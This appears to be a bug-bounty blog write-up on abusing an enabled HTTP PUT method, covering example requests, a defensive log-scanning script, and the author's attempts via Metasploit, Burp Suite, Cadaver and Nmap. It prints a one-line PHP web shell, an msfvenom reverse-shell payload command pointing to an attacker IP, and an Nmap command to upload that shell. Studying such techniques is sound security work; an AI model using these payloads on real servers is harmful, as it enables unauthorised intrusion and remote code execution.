
# HTTP PUT Method Exploit

![](/files/IWGKzfGlZLjlc94Yzx4U)

Hello hackers, hope you are well!!

Today I'll talk about one of the most basic web attacks, which I recently came across while bug hunting on a private program: exploiting an enabled HTTP PUT method.

## <mark style="color:green;">What is PUT?</mark>

The HTTP PUT method is normally used to upload data that is saved on the server at a user-supplied URL. If enabled, an attacker may be able to place arbitrary, and potentially malicious, content into the application. Depending on the server's configuration, this may lead to compromise of other users (by uploading client-executable scripts), compromise of the server (by uploading server-executable code), or other attacks.

### <mark style="color:green;">Syntax</mark>

```
PUT /new.html HTTP/1.1
```

### <mark style="color:green;">Example</mark>

#### Request

```
PUT /new.html HTTP/1.1
Host: example.com
Content-type: text/html
Content-length: 16

<p>New File</p>
```

#### Responses

If the target resource does not have a current representation and the `PUT` request successfully creates one, then the origin server must inform the user agent by sending a [`201`](https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/201) (`Created`) response.

```
HTTP/1.1 201 Created
Content-Location: /new.html
```

If the target resource does have a current representation and that representation is successfully modified in accordance with the state of the enclosed representation, then the origin server must send either a [`200`](https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/200) (`OK`) or a [`204`](https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/204) (`No Content`) response to indicate successful completion of the request.

```
HTTP/1.1 204 No Content
Content-Location: /existing.html
```
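
The success codes above (`201`, `200`, `204`) are also what a defender can look for in web server logs. The following is an added example, not part of the original post: it scans access-log lines for `PUT` requests that succeeded and counts later `GET` hits on the same path. The log lines are constructed samples in the common "combined" format, and the function name and the extension list are assumptions.

```python
import re

# Constructed sample lines in Apache/nginx "combined" log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2024:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2024:10:01:09 +0000] "PUT /poc.txt HTTP/1.1" 201 0 "-" "curl/8.0"
203.0.113.7 - - [10/Mar/2024:10:01:15 +0000] "GET /poc.txt HTTP/1.1" 200 11 "-" "curl/8.0"
198.51.100.4 - - [10/Mar/2024:10:02:30 +0000] "PUT /api/items/7 HTTP/1.1" 405 166 "-" "python-requests/2.31"
203.0.113.7 - - [10/Mar/2024:10:03:41 +0000] "PUT /poc.php HTTP/1.1" 204 0 "-" "curl/8.0"
203.0.113.7 - - [10/Mar/2024:10:03:50 +0000] "GET /poc.php?x=1 HTTP/1.1" 200 31 "-" "curl/8.0"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
PUT_SUCCESS = {200, 201, 204}  # success codes described in the Responses section
SCRIPT_EXT = (".php", ".jsp", ".asp", ".aspx", ".cgi")  # assumption: server-executable types


def find_put_uploads(log_text):
    """Return one finding per successfully PUT path, with later GET hits counted."""
    findings = {}  # path -> finding, kept in order of first successful PUT
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        client, when, method, target, status = m.groups()
        path = target.split("?", 1)[0]  # compare on path, ignore the query string
        status = int(status)
        if method == "PUT" and status in PUT_SUCCESS:
            findings.setdefault(path, {
                "path": path, "client": client, "time": when,
                "created": status == 201,  # 201 = new file, 200/204 = overwrite
                "script": path.lower().endswith(SCRIPT_EXT),
                "fetched_after": 0,
            })
        elif method == "GET" and status == 200 and path in findings:
            findings[path]["fetched_after"] += 1
    return list(findings.values())


if __name__ == "__main__":
    for f in find_put_uploads(SAMPLE_LOG):
        level = "HIGH" if f["script"] else "MEDIUM"
        print(f'{level} {f["client"]} PUT {f["path"]} at {f["time"]} '
              f'(new file: {f["created"]}, later GETs: {f["fetched_after"]})')
```

A rejected `PUT` (the `405` line) is ignored, so the findings reflect only writes the server actually accepted.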

### <mark style="color:green;">Real Life Scenario</mark>

While doing some recon on a private program, after gathering subdomains I always convert live.txt to IPs to run some port scanning, using a simple Go script, [h2i](https://github.com/cybercdh/h2i).

![](/files/rBp79LQUD6CbGG2FJwIZ)

Since this program has a small scope I got only a few IPs; in this situation I prefer using Nmap over masscan.

After a few minutes I got a very interesting result, which was something like this.

![](/files/wWuXMmMtp6s7mnGFg8z0)

Without wasting any time, I quickly opened Metasploit to check whether the PUT method allowed uploading or creating any files on this subdomain.

### <mark style="color:green;">Exploit using Metasploit</mark>

Create a test txt file to try uploading it to the web server.

![](/files/NyvV4YbcVc1tr5wRhdPP)

By using the **`auxiliary/scanner/http/http_put`** module in Metasploit we can scan for the HTTP PUT method.

![](/files/A7QHeCdgHS1ZyM4RJ2W3)

After visiting this path on the vulnerable domain, we can see that the injection worked fine.

![](/files/kL4wftpG6VVSRVlbSmbb)

![](https://media.giphy.com/media/msKNSs8rmJ5m/giphy.gif)

### <mark style="color:green;">Exploit with Burp Suite</mark>

As we all know, [Burp Suite](https://portswigger.net/burp) is one of the most popular intercepting proxy tools, with which you can easily analyze all kinds of GET and POST requests.

*Burp or Burp Suite is a graphical tool for testing Web application security. The tool is written in Java and developed by PortSwigger Security. The important tools inside* [*Burp Suite*](https://portswigger.net/burp) *are HTTP Proxy, Scanner, Intruder, Spider, Repeater, Decoder, Comparer, Extender and Sequencer.*

By intercepting a GET request to <http://redact.redact.redact.target.com> and changing it to PUT, we can create files and add any content to them.

![](/files/tdAZVkjDxM5ccyqW5Baf)

Sending a GET request to this newly created file, <http://redact.redact.redact.target.com/strik3rpoc.php>, we can see that it was also created successfully.

![](/files/HnJlOQXgWhgWRSxgNemg)

⭐ <mark style="color:orange;">**Golden TIP:**</mark> "*always try to escalate*". With that being said, I tried to get Remote Code Execution by putting some malicious PHP code in this file.

```
<?php system($_GET['cmd']); ?>
```

![](/files/IDwHZD3I2TGPQIThwaDe)

I attempted to execute a command with the injected parameter `cmd` but got nothing back.

![](/files/Jm3SjIV6GTUwbYscWDF4)

I tried many ways to get commands to run but had no luck 😥; the file always reflects its content without executing any command.

### <mark style="color:green;">Exploit With Cadaver & Metasploit Framework</mark>

I tried to upload a malicious PHP file, which we'll generate with the help of the [msfvenom](https://www.offensive-security.com/metasploit-unleashed/msfvenom/#:~:text=MSFvenom%20is%20a%20combination%20of,Standardized%20command%20line%20options) command.

`msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.179.141 LPORT=4444 -f raw > shell.php`

![](/files/kBBFENZeTFZPz4E7sjfM)

Now run the Cadaver tool, which is already installed on every Kali Linux machine. Cadaver is a command-line tool that supports uploading and downloading files over WebDAV.

To run Cadaver, the command is:

`cadaver http://target.com/`

If all is good so far, we can upload the **shell.php** file that you created with msfvenom.

But I do not know why it didn't work for me ¯\\\_(ツ)\_/¯

![](https://media.giphy.com/media/7SF5scGB2AFrgsXP63/giphy.gif)

Anyway, when you face this situation you can upload the shell via [Metasploit as in the step above](#exploit-using-metasploit), or you can use an Nmap script to upload it with this command:

`nmap -p 80 target.com --script http-put --script-args http-put.url='strik3r_nmap.php',http-put.file='/root/shell.php'`

> Thanks For Reading



